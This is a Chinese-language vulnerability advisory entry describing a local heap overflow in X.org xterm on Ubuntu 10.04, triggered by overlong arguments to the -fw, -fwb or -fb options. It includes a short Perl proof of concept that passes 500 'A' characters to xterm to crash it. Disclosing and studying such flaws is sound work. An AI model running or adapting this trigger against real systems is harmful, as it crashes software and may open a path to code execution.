Xterm超长命令参数本地堆溢出漏洞

漏洞起因
边界条件错误
危险等级
低

影响系统
X.org xterm(256)
-Ubuntu 10.04

不受影响系统

危害
本地攻击者可以利用漏洞使应用程序崩溃。

攻击所需条件
攻击者必须xterm。

漏洞信息
xterm是一款X Window System上的标准虚拟终端。
向Xterm的-fw、-fwb或-fb命令行选项提交超长参数可触发堆溢出，本地攻击者可以利用漏洞执行任意代码。

测试方法
# Contact: www.securityarchitect.org
$file = "A" x 500;
$print = "xterm -fw $file";
system $print;

厂商解决方案
目前没有详细解决方案提供：
http://www.x.org/

漏洞提供者
musashi karak0rsan

漏洞消息链接
http://archives.neohapsis.com/archives/fulldisclosure/2010-09/0007.html

← Zope未明拒绝服务漏洞

Sony PlayStation 3 (PS3)本地USB缓冲区溢出漏洞 →

ZeroBox Vulnerability Database

坚持！我们将做的更好！

Xterm超长命令参数本地堆溢出漏洞

0 条评论。

发表评论